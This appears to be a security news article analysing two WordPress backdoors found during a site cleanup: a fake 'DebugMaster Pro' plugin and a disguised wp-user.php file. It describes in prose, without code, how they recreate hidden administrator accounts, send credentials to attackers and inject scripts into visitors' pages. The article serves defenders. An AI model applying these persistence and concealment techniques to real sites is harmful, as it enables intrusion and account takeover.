Attackers have stepped up their tactics by deploying stealthy backdoors disguised as legitimate WordPress components, ensuring persistent administrative access even after other malware is discovered and removed.
Their deceptive appearances belied their dangerous functions: one impersonated a plugin, the other camouflaged itself as a core file. Together, they formed a resilient system that gave hackers unfettered control over the compromised website.
During a recent cleanup of a compromised site, two malicious files were uncovered—each masquerading as standard WordPress code but designed to manipulate administrator accounts silently.
The first malicious component was located at ./wp-content/plugins/DebugMaster/DebugMaster.php.
Billed as “DebugMaster Pro,” it presented itself with plausible plugin metadata and typical developer comments. In reality, its contents were heavily obfuscated and packed with hidden routines.
On close inspection, this file contained code that created a secret administrator user with hardcoded credentials, then concealed that user by filtering queries and removing itself from the plugin list.
The second file, ./wp-user.php, sat at the root of the WordPress installation, appearing simply as another core file.
It was far more streamlined in design than the fake plugin but equally insidious. This script continuously checked for the presence of a specific admin user.
If the user existed, the file would delete and then immediately recreate it with the attacker’s known password; if the user did not exist, it would simply generate it.
This snippet forces WordPress to create a new user named help with the role of administrator. If the user already exists, the script ensures it has administrator privileges restored.
Through this cyclical process, any attempt to remove or modify the account was instantly reversed.
What Was the Malware Doing?
Both files shared the same objective: to guarantee ongoing administrative privileges for the intruders.
The complex backdoor disguised as DebugMaster Pro established a new administrator upon activation and communicated those credentials to a remote command-and-control server.
The credentials were formatted into JSON, Base64-encoded, and transmitted via an obfuscated endpoint—allowing attackers to monitor and harvest login details without triggering alarm.
Simultaneously, the wp-user.php script functioned as an aggressive recovery tool. It enforced the creation or recreation of the specified admin user on every execution, making manual removal futile.
Even if site owners noticed suspicious accounts and attempted to delete or rename them, the script restored the attacker’s access on the next page load or scheduled event.
Beyond account manipulation, the DebugMaster file injected external JavaScript into every visitor’s page, excluding administrators and any whitelisted IP addresses.
This injected code could serve multiple purposes—redirecting traffic to malicious domains, delivering spam content, or harvesting visitor data. It also collected IP addresses of administrators for reconnaissance, logging them locally or sending them back to the attackers.
Analysis of the Malware
The fake DebugMaster Pro plugin exemplifies how threat actors leverage social engineering and technical obfuscation.
By mimicking a legitimate developer tool plugin, attackers reduced scrutiny from site administrators who might overlook an innocuous-sounding add-on.
In combination, these two files created a dual-layered persistence strategy: one layer for stealth and remote monitoring, the other for brute-force restoration of credentials.
The backdoor code was hidden behind layers of Base64 encoding, making detection by signature-based scanners difficult.
Its filtering hooks removed any trace of its existence from the WordPress dashboard, while its remote logging channel ensured attackers received real-time updates on new administrator accounts.
Meanwhile, the wp-user.php backdoor demonstrated a simple yet effective persistence mechanism. Rather than relying on complex evasion techniques, it guaranteed that the attacker’s chosen account could never be permanently removed.
This brute-force approach to account maintenance meant that even a skilled administrator could not outpace the script without first identifying and deleting the malicious file itself.
This hybrid method allowed attackers to remain embedded within the WordPress site indefinitely, evading cleanup efforts and retaining full control.
Website owners are urged to audit all plugin directories and core files for unauthorized modifications, enable file integrity monitoring, and enforce strict administrative account reviews to defend against these sophisticated silent malware campaigns.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
